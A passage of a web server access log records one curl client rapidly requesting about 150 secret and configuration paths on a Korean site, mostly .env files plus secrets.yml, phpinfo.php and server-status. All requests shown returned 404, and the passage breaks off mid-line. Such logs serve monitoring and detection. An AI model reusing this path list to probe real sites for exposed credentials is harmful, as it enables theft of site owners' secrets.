-[16/Feb/2026:15:14:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/selfish-darling-backend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sendgrid.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/serve-browserbench/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Serve_time_server/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/server-status" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/server.log" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/server/config/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/server/laravel/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/server/s3.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/server/src/persistence/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Server_with_db/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/serverless.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/service-worker.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/service/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/adminer/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/deployment-agent/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/documents/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/graylog/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/jaeger/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/minio/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/monitoring/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/portainer/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/redis-commander/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/registry/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/simcore/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/services/traefik/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sessions/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/settings.py" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/shared/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/shibboleth/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/shop/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/shopware/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Simple_server/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/site-library/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sitemaps/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sites/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sitestatic/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Socketio/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/source/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sources/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/Sources/API/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/spearmint/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/spikes/config-material-app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/SpotiApps/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/__tests__/__fixtures__/instanceWithDependentSteps/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/__tests__/__fixtures__/typeScriptIntegrationProject/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/__tests__/__fixtures__/typeScriptProject/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/__tests__/__fixtures__/typeScriptVisualizeProject/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/add-auth/express/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/assembly/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/character-service/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/client/mobile/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/core/tests/dotenv-files/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/gameprovider-service/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/main/front-end/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/renderer/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/srv6_controller/controller/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/srv6_controller/examples/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/srv6_controller/node-manager/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/st-js-be-2020-movies-two/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/stack.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/stackato-pkg/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/stag/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/staging-api/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/staging/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/staging/api/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/staging/backend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/staging/frontend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static-collected/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static-html/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static-root/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/*.chunk.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/main.11bc02d8.chunk.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/main.1b34ee2a.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/main.335d17a0.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/main.36e5ec99.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/main.48389ac6.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/main.4aa2819f.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/main.602cea98.chunk.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/main.87c766e3.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/main.89c971fa.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/main.8c18b542.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/main.bfa51071.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static/js/main.ef8ecb99.chunk.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static_prod/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static_root/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/static_user/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/staticfiles/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/stats/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/storage/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/storage/.env.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/storage/debugbar/*.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/strapi/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/style/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/styles/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/stylesheets/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/swagger/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/symfony/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/system-config/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/system/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/system/config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/system/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/target/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/temanr10/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/temanr9/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/temp.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/temp/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/template/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/templates/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test-api/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test-network/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:36 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test-network/addOrg3/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/aries-js-worker/fixtures/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/bdd/fixtures/adapter-rest/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:37 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/bdd/fixtures/agent-rest/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/bdd/fixtures/couchdb/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/bdd/fixtures/demo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/bdd/fixtures/demo/openapi/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:38 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/bdd/fixtures/did-method-rest/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/bdd/fixtures/did-rest/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/bdd/fixtures/edv-rest/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/bdd/fixtures/openapi-demo/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:39 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/bdd/fixtures/sidetree-mock/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/bdd/fixtures/universalresolver/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/bdd/fixtures/vc-rest/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:14:40 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/fixtures/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 